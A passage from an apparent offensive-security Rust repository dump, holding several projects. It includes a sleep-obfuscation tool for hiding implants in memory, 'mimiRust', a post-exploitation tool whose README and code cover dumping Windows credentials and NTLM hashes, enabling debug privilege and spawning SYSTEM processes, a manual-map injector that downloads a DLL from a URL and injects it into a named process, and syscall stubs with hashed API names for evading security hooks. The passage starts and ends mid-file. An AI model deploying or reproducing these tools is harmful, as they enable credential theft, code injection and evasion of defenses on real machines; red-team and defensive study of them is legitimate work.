"Win32_NetworkManagement_IpHelper", 29 | "Win32_Networking_WinSock", 30 | "Win32_System_SystemInformation", 31 | "Win32_System_Environment", 32 | "Win32_System_ProcessStatus", 33 | "Win32_Globalization", 34 | "Win32_System_Diagnostics_ToolHelp", 35 | "Win32_System_Kernel", 36 | "Win32_System_Pipes", 37 | "Win32_Storage_FileSystem", 38 | "Win32_System_IO", 39 | ] 40 | -------------------------------------------------------------------------------- /memN0ps/ekko-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/ekko-rs/README.md: -------------------------------------------------------------------------------- 1 | # Ekko in Rust 2 | 3 | A small sleep obfuscation technique that uses the `CreateTimerQueueTimer` Win32 API function ported from C https://github.com/Cracked5pider/Ekko/ to Rust. 4 | 5 | ## Debugging 6 | 7 | For debugging uncomment `env_logger::init();` in main and set Powershell environment variable to `$Env:RUST_LOG="info"`. 8 | 9 | ## Example 10 | 11 | ``` 12 | PS C:\Users\memN0ps\Documents\GitHub\ekko-rs\target\debug\ekko-rs.exe 13 | [*] Ekko Sleep Obfuscation by @memN0ps and @trickster0. Full credits to Cracked5pider (@C5pider), Austin Hudson (@SecIdiot), Peter Winter-Smith (@peterwintrsmith) 14 | [+] Queue timers 15 | [+] Wait for hEvent 16 | [+] Finished waiting for event 17 | [+] Queue timers 18 | [+] Wait for hEvent 19 | [+] Finished waiting for event 20 | [+] Queue timers 21 | [+] Wait for hEvent 22 | [+] Finished waiting for event 23 | [+] Queue timers 24 | [+] Wait for hEvent 25 | [+] Finished waiting for event 26 | [+] Queue timers 27 | [+] Wait for hEvent 28 | [+] Finished waiting for event 29 | [+] Queue timers 30 | [+] Wait for hEvent 31 | [+] Finished waiting for event 32 | [+] Queue timers 33 | [+] Wait for hEvent 34 | [+] Finished waiting for event 35 | [+] Queue timers 36 | [+] Wait for hEvent 37 | [+] Finished waiting for event 38 | ``` 39 | 40 | ## Credits / References 41 | 42 | - [@C5pider](https://twitter.com/C5pider) https://github.com/Cracked5pider/Ekko/ 43 | - [Austin Hudson (@SecIdiot)](https://twitter.com/ilove2pwn_) https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html / https://web.archive.org/web/20220702162943/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html 44 | - Originally discovered by [Peter Winter-Smith](peterwintrsmith) and used in MDSec’s Nighthawk 45 | - Thanks for contributing [@trickster012](https://twitter.com/trickster012) 46 | - https://learn.microsoft.com/ 47 | - Rust Lang Community Discord: https://discord.com/invite/rust-lang-community ([MaulingMonkey](https://github.com/MaulingMonkey/)) -------------------------------------------------------------------------------- /memN0ps/ekko-rs/src/main.rs: -------------------------------------------------------------------------------- 1 | mod ekko; 2 | 3 | fn main() { 4 | //env_logger::init(); 5 | println!("[*] Ekko Sleep Obfuscation by @memN0ps and @trickster0. Full credits to Cracked5pider (@C5pider), Austin Hudson (@SecIdiot), Peter Winter-Smith (@peterwintrsmith)"); 6 | 7 | let mut key_buf = "1234567890ABCDEF\0".as_bytes().to_vec(); 8 | loop { 9 | ekko::ekko(4000, &mut key_buf); 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /memN0ps/mimiRust/.cargo/config: -------------------------------------------------------------------------------- 1 | [target.x86_64-pc-windows-msvc] 2 | rustflags = ["-Ctarget-feature=+crt-static", "-Clink-arg=/DEBUG:NONE"] 3 | 4 | [target.i686-pc-windows-msvc] 5 | rustflags = ["-Ctarget-feature=+crt-static", "-Clink-arg=/DEBUG:NONE"] -------------------------------------------------------------------------------- /memN0ps/mimiRust/.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | *.lock -------------------------------------------------------------------------------- /memN0ps/mimiRust/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "mimiRust" 3 | version = "0.1.0" 4 | edition = "2018" 5 | 6 | [dependencies] 7 | winapi = { version = "0.3", features = ["bcrypt", "winnt", "minwindef", "ntdef", "libloaderapi", "psapi", "securitybaseapi", "tlhelp32", "processthreadsapi", "handleapi"] } 8 | winreg = "0.10.1" 9 | kernel32-sys = "0.2.2" 10 | memsec = "0.6.0" 11 | libc = "0.2.15" 12 | byteorder = "1.4.3" 13 | sysinfo = "0.15.3" 14 | anyhow = "1.0" 15 | aes = "0.7.5" 16 | block-modes = "0.8.1" 17 | des = "0.0.2" 18 | regex = "1.5.4" 19 | clap = { version = "3.0.5", features = ["derive"] } 20 | whoami = "1.2.1" 21 | md-5 = "0.10.1" 22 | console = "0.15.0" 23 | 24 | [profile.release] 25 | panic = 'abort' 26 | lto = true 27 | opt-level = "z" -------------------------------------------------------------------------------- /memN0ps/mimiRust/README.md: -------------------------------------------------------------------------------- 1 | # MimiRust - Hacking the Windows operating system to hand us the keys to the kingdom with Rust. 2 | 3 | 4 | 5 | ███▄ ▄███▓ ██▓ ███▄ ▄███▓ ██▓ ██▀███ █ ██ ██████ ▄▄▄█████▓ 6 | ▓██▒▀█▀ ██▒▓██▒▓██▒▀█▀ ██▒▓██▒▓██ ▒ ██▒ ██ ▓██▒▒██ ▒ ▓ ██▒ ▓▒ 7 | ▓██ ▓██░▒██▒▓██ ▓██░▒██▒▓██ ░▄█ ▒▓██ ▒██░░ ▓██▄ ▒ ▓██░ ▒░ 8 | ▒██ ▒██ ░██░▒██ ▒██ ░██░▒██▀▀█▄ ▓▓█ ░██░ ▒ ██▒░ ▓██▓ ░ 9 | ▒██▒ ░██▒░██░▒██▒ ░██▒░██░░██▓ ▒██▒▒▒█████▓ ▒██████▒▒ ▒██▒ ░ 10 | ░ ▒░ ░ ░░▓ ░ ▒░ ░ ░░▓ ░ ▒▓ ░▒▓░░▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░ 11 | ░ ░ ░ ▒ ░░ ░ ░ ▒ ░ ░▒ ░ ▒░░░▒░ ░ ░ ░ ░▒ ░ ░ ░ 12 | ░ ░ ▒ ░░ ░ ▒ ░ ░░ ░ ░░░ ░ ░ ░ ░ ░ ░ 13 | ░ ░ ░ ░ ░ ░ ░ 14 | 15 | written in Rust by ThottySploity 16 | mimiRust $ means it's running without elevated privileges 17 | mimiRust # means it's running with elevated privileges 18 | mimiRust @ means it's running with system privileges 19 | 20 | 21 | mimiRust @ ? 22 | 23 | Choose one of the following options: 24 | 25 | passwords: 26 | • dump-credentials Dumps systems credentials through Wdigest. 27 | • dump-hashes Dumps systems NTLM hashes (requires SYSTEM permissions). 28 | • clear Clears the screen of any past output. 29 | • exit Moves to top level menu 30 | 31 | pivioting: 32 | • shell Execute a shell command through cmd, returns output. 33 | • clear Clears the screen of any past output. 34 | • exit Moves to top level menu 35 | • (W.I.P)psexec Executes a service on another system. 36 | • (W.I.P)pth Pass-the-Hash to run a command on another system. 37 | • (W.I.P)golden-ticket Creates a golden ticket for a user account with the domain. 38 | 39 | privilege: 40 | • spawn-path Spawn program with SYSTEM permissions from location. 41 | • clear Clears the screen of any past output. 42 | • exit Moves to top level menu 43 | 44 | mimiRust @ passwords 45 | mimiRust::passwords @ dump-credentials 46 | 47 | 48 |

MimiRust is a post-exploitation tool that can be used within redteam operations. Like the name suggests the entire project is made within the Rust language. MimiRust is capable of the following actions:

49 |
    50 |
  • Spawning any process as SYSTEM
    • 51 |
  • Executing shell commands
    • 52 |
  • Extracting Windows passwords out of memory through the wdigest attack vector.
    • 53 |
  • Extracting Windows NTLM hashes from user accounts (aes / des) & (md5 / rc4)
    • 54 |

55 |

Todo:

56 |
    57 |
  • PSExec to create service on another endpoint.
    • 58 |
  • PtH (Pass-The-Hash)
    • 59 |
  • Kerberos Golden Ticket
    • 60 |
61 | 62 | Maybe in the future I will make it polymorphic and obfuscate the strings (also polymorphic) and API calls. 63 | 64 | 65 |

Quick usage:

66 |

MimiRust can be ran in two different ways: from the command line using mimiRust.exe --help or in the shell by running the executable without any command line arguments. For help with the program type one of the following into mimiRust:

67 |
    68 |
  • mimiRust # ?
    • 69 |
  • mimiRust # h
    • 70 |
  • mimiRust # help
    • 71 |
72 |

You will now be required to type in the module that you want to access, current modules are:

73 |
    74 |
  • passwords
    • 75 |
  • pivioting
    • 76 |
  • privilege
    • 77 |
78 | 79 |

Dumping credentials from memory through wdigest

80 | mimiRust::passwords # dump-credentials
81 | mimiRust.exe --dump-credentials 82 |
83 | 84 |

Dumping NTLM hashes from user accounts

85 | mimiRust::passwords @ dump-hashes
86 | mimiRust.exe --dump-hashes 87 |
88 | 89 |

Executing shell commands

90 | mimiRust::pivioting $ shell whoami 91 |
92 | 93 |

Spawning a process with SYSTEM

94 | mimiRust::privilege # spawn-path cmd.exe
95 | mimiRust.exe -s cmd.exe 96 | 97 |

Demo

98 | click on the demo to get a higher resolution 99 | mimiRust Demo 100 | 101 |

Disclaimer

102 |

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

103 |
104 |

Author

105 |

Why was MimiRust made

106 |

MimiRust was created as a project by a first years Cyber Security Bachelors student. The reason for this is because I was too bored learning about business processes in a Security Bachelors that I decided to just start for myself.

107 |
108 | -------------------------------------------------------------------------------- /memN0ps/mimiRust/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/mimiRust/demo.gif -------------------------------------------------------------------------------- /memN0ps/mimiRust/src/lateral_movement/kerberos/mod.rs: -------------------------------------------------------------------------------- 1 | pub struct GoldenTicket; 2 | 3 | impl GoldenTicket { 4 | pub fn create() { 5 | println!("WIP"); 6 | } 7 | } -------------------------------------------------------------------------------- /memN0ps/mimiRust/src/lateral_movement/mod.rs: -------------------------------------------------------------------------------- 1 | pub mod pth; 2 | pub mod kerberos; 3 | pub mod scm; -------------------------------------------------------------------------------- /memN0ps/mimiRust/src/lateral_movement/pth/mod.rs: -------------------------------------------------------------------------------- 1 | pub struct ExecuteWMI; 2 | 3 | impl ExecuteWMI { 4 | pub fn new() { 5 | println!("WIP"); 6 | } 7 | } -------------------------------------------------------------------------------- /memN0ps/mimiRust/src/lateral_movement/scm/mod.rs: -------------------------------------------------------------------------------- 1 | pub struct PSExec; 2 | 3 | impl PSExec { 4 | pub fn new() { 5 | println!("WIP"); 6 | } 7 | } -------------------------------------------------------------------------------- /memN0ps/mimiRust/src/passwords/mod.rs: -------------------------------------------------------------------------------- 1 | pub mod ntlm; 2 | pub mod wdigest; -------------------------------------------------------------------------------- /memN0ps/mimiRust/src/utilities/mod.rs: -------------------------------------------------------------------------------- 1 | 2 | use winapi::um::winbase::{ 3 | LookupPrivilegeValueW, 4 | }; 5 | 6 | use winapi::um::processthreadsapi::{ 7 | OpenProcessToken, 8 | GetCurrentProcess, 9 | }; 10 | 11 | use winapi::um::securitybaseapi::{ 12 | AdjustTokenPrivileges, 13 | GetTokenInformation, 14 | }; 15 | 16 | use winapi::um::handleapi::CloseHandle; 17 | 18 | use winapi::um::winnt::{ 19 | TOKEN_ADJUST_PRIVILEGES, 20 | SE_PRIVILEGE_ENABLED, 21 | TOKEN_PRIVILEGES, 22 | TOKEN_QUERY, 23 | HANDLE, 24 | TOKEN_ELEVATION, 25 | TokenElevation, 26 | }; 27 | 28 | use winapi::shared::minwindef::FALSE; 29 | 30 | use std::io::Error; 31 | use std::ptr::null_mut; 32 | 33 | use std::io::{ 34 | stdin, 35 | stdout, 36 | Write 37 | }; 38 | 39 | const SE_DEBUG_NAME: [u16 ; 17] = [83u16, 101, 68, 101, 98, 117, 103, 80, 114, 105, 118, 105, 108, 101, 103, 101, 0]; 40 | 41 | pub struct Utils; 42 | 43 | impl Utils { 44 | pub fn enable_debug_privilege() -> (bool, String) { 45 | unsafe { 46 | let mut token = null_mut(); 47 | let mut privilege: TOKEN_PRIVILEGES = std::mem::zeroed(); 48 | 49 | privilege.PrivilegeCount = 1; 50 | privilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 51 | 52 | let result = LookupPrivilegeValueW(null_mut(), SE_DEBUG_NAME.as_ptr(), &mut privilege.Privileges[0].Luid); 53 | if result == FALSE { 54 | return (false, format!("[x] LookupPrivilege Error: {}", Error::last_os_error())); 55 | } else { 56 | let res = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &mut token); 57 | if res == FALSE { 58 | return (false, format!("[x] OpenProcessToken Error: {}", Error::last_os_error())); 59 | } else { 60 | let token_adjust = AdjustTokenPrivileges(token, FALSE, &mut privilege, std::mem::size_of_val(&privilege) as u32, null_mut(), null_mut()); 61 | if token_adjust == FALSE { 62 | return (false, format!("[x] AdjustTokenPrivileges Error: {}", Error::last_os_error())); 63 | } else { 64 | let close_handle = CloseHandle(token); 65 | if close_handle == FALSE { 66 | return (false, format!("[x] CloseHandle Error: {}", Error::last_os_error())); 67 | } else { 68 | return (true, format!("[!] Trying to enable debug privileges")); 69 | } 70 | } 71 | } 72 | } 73 | } 74 | } 75 | 76 | pub fn is_elevated() -> bool { 77 | let mut h_token: HANDLE = null_mut(); 78 | let mut token_ele: TOKEN_ELEVATION = TOKEN_ELEVATION { TokenIsElevated: 0 }; 79 | let mut size: u32 = 0u32; 80 | unsafe { 81 | OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &mut h_token); 82 | GetTokenInformation( 83 | h_token, 84 | TokenElevation, 85 | &mut token_ele as *const _ as *mut _, 86 | std::mem::size_of::() as u32, 87 | &mut size, 88 | ); 89 | return token_ele.TokenIsElevated == 1; 90 | } 91 | } 92 | 93 | pub fn is_system() -> bool { 94 | if format!("{}", whoami::username()).to_lowercase() == "system" { 95 | return true; 96 | } 97 | return false; 98 | } 99 | 100 | pub fn get_user_input(addition: Option) -> Vec { 101 | let mut s = String::new(); 102 | let mut result: Vec = vec![]; 103 | let perm = get_permission_status(); 104 | 105 | match perm { 106 | 0 => { 107 | //System: @ 108 | 109 | if let Some(addition) = addition { 110 | print!("{}", format!("mimiRust::{} @ ", addition)); 111 | } else { 112 | print!("mimiRust @ "); 113 | } 114 | }, 115 | 1 => { 116 | //Admin: # 117 | if let Some(addition) = addition { 118 | print!("{}", format!("mimiRust::{} # ", addition)); 119 | } else { 120 | print!("mimiRust # "); 121 | } 122 | }, 123 | _ => { 124 | //User: $ 125 | if let Some(addition) = addition { 126 | print!("{}", format!("mimiRust::{} $ ", addition)); 127 | } else { 128 | print!("mimiRust $ "); 129 | } 130 | }, 131 | }; 132 | 133 | let _=stdout().flush(); 134 | stdin().read_line(&mut s).expect("Did not enter correct characters"); 135 | if let Some('\n')=s.chars().next_back() { 136 | s.pop(); 137 | } 138 | if let Some('\r')=s.chars().next_back() { 139 | s.pop(); 140 | } 141 | 142 | for string in s.split(" ") { 143 | result.push(string.to_string()); 144 | } 145 | 146 | return result; 147 | } 148 | } 149 | 150 | fn get_permission_status() -> i32 { 151 | if Utils::is_elevated() { 152 | if Utils::is_system() { 153 | return 0; 154 | } 155 | return 1; 156 | } else { 157 | return 2; 158 | } 159 | } -------------------------------------------------------------------------------- /memN0ps/mmapper-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/mmapper-rs/README.md: -------------------------------------------------------------------------------- 1 | # Manual Mapper 2 | 3 | A manual mapper written in Rust 4 | 5 | ## USAGE 6 | ``` 7 | manual_map-rs.exe --process --url 8 | ``` 9 | 10 | ## Features 11 | 12 | * Manual Mappping in Remote process 13 | * Manual Mappping x64 DLLs 14 | * Rebasing image and resolving imports in the local process 15 | * Download DLL remotely (HTTP supported and HTTPS ToDo) 16 | * Manual Mappping in local process (ToDo) 17 | * Manual Mappping in an executable file (ToDo) 18 | * TLS callbacks (ToDo) 19 | 20 | ## References 21 | 22 | * https://github.com/Ben-Lichtman (B3NNY) 23 | * https://www.ired.team/offensive-security/code-injection-process-injection/pe-injection-executing-pes-inside-remote-processes 24 | * https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations 25 | * https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection 26 | * https://andreafortuna.org/2018/09/24/some-thoughts-about-pe-injection/ 27 | * https://blog.sevagas.com/PE-injection-explained 28 | * http://www.rohitab.com/discuss/topic/41441-pe-injection-new/ 29 | * https://github.com/not-matthias/mmap/ 30 | * https://github.com/2vg/blackcat-rs/ 31 | * https://github.com/Kudaes/DInvoke_rs/ 32 | * https://github.com/zorftw/kdmapper-rs/ 33 | * https://github.com/stephenfewer/ReflectiveDLLInjection/ 34 | * https://github.com/Zer0Mem0ry/ManualMap 35 | * https://github.com/MrElectrify/mmap-loader-rs/ 36 | * https://github.com/seal9055/darksouls3_cheats 37 | * https://guidedhacking.com/threads/manual-mapping-dll-injection-tutorial-how-to-manual-map.10009/ 38 | * https://0xrick.github.io/win-internals/pe7/#relocations 39 | * https://docs.microsoft.com/en-us/windows/win32/debug/pe-format 40 | * https://stackoverflow.com/questions/17436668/how-are-pe-base-relocations-build-up 41 | * https://discord.com/invite/rust-lang-community (Rust Programming Language Community Server - Discord) 42 | -------------------------------------------------------------------------------- /memN0ps/mmapper-rs/loader/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | -------------------------------------------------------------------------------- /memN0ps/mmapper-rs/loader/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [lib] 9 | name = "loader" 10 | 11 | [dependencies] 12 | winapi = { version = "0.3.9", features = ["processthreadsapi", "memoryapi", "winbase", "impl-default", "errhandlingapi", "handleapi", "winuser", "heapapi", "impl-default"] } 13 | sysinfo = "0.20.4" 14 | clap = { version = "3.1.6", features = ["derive"] } 15 | ureq = "2.4.0" 16 | anyhow = "1.0.56" -------------------------------------------------------------------------------- /memN0ps/mmapper-rs/loader/src/main.rs: -------------------------------------------------------------------------------- 1 | use sysinfo::{Pid, SystemExt, ProcessExt}; 2 | use std::io::Read; 3 | use clap::Parser; 4 | 5 | mod lib; 6 | 7 | /// Manual Map DLL Injector (Manual Mapping) 8 | #[derive(Parser, Debug)] 9 | #[clap(author, version, about, long_about = None)] 10 | struct Args { 11 | /// Target process to manually map a DLL 12 | #[clap(short, long)] 13 | process: String, 14 | /// URL of the DLL to manually map 15 | #[clap(short, long)] 16 | url: String, 17 | } 18 | 19 | fn main() { 20 | let args = Args::parse(); 21 | 22 | //let dll_bytes = include_bytes!(""); 23 | let payload = get_payload_remotely(args.url.as_str()); 24 | 25 | let dll_bytes = match payload { 26 | Ok(p) => p, 27 | Err(_) => panic!("[-] Failed to download file remotely"), 28 | }; 29 | 30 | let process_id = get_process_id_by_name(args.process.as_str()) as u32; 31 | println!("[+] Process ID: {:}", process_id); 32 | 33 | lib::manual_map(dll_bytes, process_id); 34 | } 35 | 36 | /// Download a file remotely and convert to a Vector of u8 bytes 37 | fn get_payload_remotely(url: &str) -> Result, anyhow::Error> { 38 | let resp = ureq::get(url) 39 | .set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0") 40 | .call()?; 41 | 42 | let len: usize = resp.header("Content-Length") 43 | .unwrap() 44 | .parse()?; 45 | 46 | let mut bytes: Vec = Vec::with_capacity(len); 47 | resp.into_reader() 48 | .take(10_000_000) 49 | .read_to_end(&mut bytes)?; 50 | 51 | Ok(bytes) 52 | } 53 | 54 | /// Get process ID by name 55 | fn get_process_id_by_name(target_process: &str) -> Pid { 56 | let mut system = sysinfo::System::new(); 57 | system.refresh_all(); 58 | 59 | let mut process_id = 0; 60 | 61 | for process in system.process_by_name(target_process) { 62 | process_id = process.pid(); 63 | } 64 | 65 | return process_id; 66 | } -------------------------------------------------------------------------------- /memN0ps/mmapper-rs/testdll/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "testdll" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [lib] 8 | crate-type = ["cdylib"] 9 | 10 | [dependencies] 11 | winapi = { version = "0.3.9", features = ["winnt", "libloaderapi", "winuser"] } -------------------------------------------------------------------------------- /memN0ps/mmapper-rs/testdll/src/lib.rs: -------------------------------------------------------------------------------- 1 | use winapi::shared::minwindef::{BOOL, DWORD, HINSTANCE, LPVOID, TRUE}; 2 | use winapi::um::winnt::DLL_PROCESS_ATTACH; 3 | use winapi::um::winuser::MessageBoxA; 4 | 5 | #[no_mangle] 6 | #[allow(non_snake_case)] 7 | pub unsafe extern "system" fn DllMain( 8 | _module: HINSTANCE, 9 | call_reason: DWORD, 10 | _reserved: LPVOID, 11 | ) -> BOOL { 12 | if call_reason == DLL_PROCESS_ATTACH { 13 | MessageBoxA( 14 | 0 as _, 15 | "Rust DLL injected!\0".as_ptr() as _, 16 | "Rust DLL\0".as_ptr() as _, 17 | 0x0, 18 | ); 19 | 20 | TRUE 21 | } else { 22 | TRUE 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | debug/ 4 | target/ 5 | 6 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 7 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 8 | Cargo.lock 9 | 10 | # These are backup files generated by rustfmt 11 | **/*.rs.bk 12 | 13 | # MSVC Windows builds of rustc generate these, which store debugging information 14 | *.pdb 15 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/blackgate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/mordor-rs/blackgate.png -------------------------------------------------------------------------------- /memN0ps/mordor-rs/freshycalls_syswhispers/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "freshycalls_syswhispers" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [features] 9 | #default = ["_DIRECT_"] 10 | #default = ["_INDIRECT_"] 11 | _INDIRECT_ = [] 12 | _DIRECT_ = [] 13 | 14 | [dependencies] 15 | env_logger = "0.9.0" 16 | log = "0.4.17" 17 | sysinfo = "0.20.4" 18 | obfstr = "0.3.0" 19 | ntapi = { version = "0.4.0", features = ["impl-default"] } 20 | 21 | [dependencies.windows-sys] 22 | version = "0.36.1" 23 | features = [ 24 | "Win32_Foundation", 25 | "Win32_Security", 26 | "Win32_System_Threading", 27 | "Win32_UI_WindowsAndMessaging", 28 | "Win32_System_Memory", 29 | "Win32_System_Diagnostics_Debug", 30 | "Win32_System_SystemServices", 31 | "Win32_System_WindowsProgramming", 32 | "Win32_System_LibraryLoader", 33 | ] -------------------------------------------------------------------------------- /memN0ps/mordor-rs/freshycalls_syswhispers/src/lib.rs: -------------------------------------------------------------------------------- 1 | #[cfg(all(feature = "_DIRECT_", feature = "_INDIRECT_"))] 2 | compile_error!("\t [!] RUST_SYSCALLS ERROR: feature \"_DIRECT_\" and feature \"_INDIRECT_\" cannot be enabled at the same time"); 3 | 4 | #[cfg(not(any(feature = "_DIRECT_", feature = "_INDIRECT_")))] 5 | compile_error!( 6 | "\t [!] RUST_SYSCALLS ERROR: feature \"_DIRECT_\" or feature \"_INDIRECT_\" must be enabled" 7 | ); 8 | 9 | pub mod obf; 10 | pub mod syscall; 11 | pub mod syscall_resolve; 12 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/freshycalls_syswhispers/src/obf.rs: -------------------------------------------------------------------------------- 1 | #[macro_export] 2 | macro_rules! obf { 3 | ($s:expr) => {{ 4 | static HASH: u32 = $crate::obf::dbj2_hash_str($s); 5 | HASH 6 | }}; 7 | } 8 | 9 | pub const fn dbj2_hash_str(arg: &str) -> u32 { 10 | dbj2_hash(arg.as_bytes()) 11 | } 12 | 13 | pub const fn dbj2_hash(buffer: &[u8]) -> u32 { 14 | let mut hsh: u32 = 5381; 15 | let mut iter: usize = 0; 16 | let mut cur: u8; 17 | 18 | while iter < buffer.len() { 19 | cur = buffer[iter]; 20 | if cur == 0 { 21 | iter += 1; 22 | continue; 23 | } 24 | if cur >= ('a' as u8) { 25 | cur -= 0x20; 26 | } 27 | hsh = ((hsh << 5).wrapping_add(hsh)) + cur as u32; 28 | iter += 1; 29 | } 30 | return hsh; 31 | } 32 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/freshycalls_syswhispers/src/syscall.rs: -------------------------------------------------------------------------------- 1 | // 2 | // Credits: Yxel / janoglezcampos / @httpyxel (https://github.com/janoglezcampos/rust_syscalls/blob/main/src/syscall.rs) 3 | // 4 | 5 | #[allow(unused_imports)] 6 | use std::arch::global_asm; 7 | 8 | #[cfg(all(feature = "_DIRECT_", not(feature = "_INDIRECT_")))] 9 | #[macro_export] 10 | macro_rules! syscall { 11 | ($function_name:expr, $($y:expr), +) => { 12 | { 13 | let (ssn, _) = $crate::syscall_resolve::get_ssn($crate::obf!($function_name)).expect("Failed to get SSN"); 14 | let mut cnt:u32 = 0; 15 | $( 16 | let _ = $y; 17 | cnt += 1; 18 | )+ 19 | freshycalls_syswhispers::syscall::do_syscall(ssn, cnt, $($y), +) 20 | }} 21 | } 22 | 23 | #[cfg(all(feature = "_INDIRECT_", not(feature = "_DIRECT_")))] 24 | #[macro_export] 25 | macro_rules! syscall { 26 | ($function_name:expr, $($y:expr), +) => { 27 | { 28 | let (ssn, addr) = $crate::syscall_resolve::get_ssn($crate::obf!($function_name)).expect("Failed to get SSN"); 29 | let mut cnt:u32 = 0; 30 | $( 31 | let _ = $y; 32 | cnt += 1; 33 | 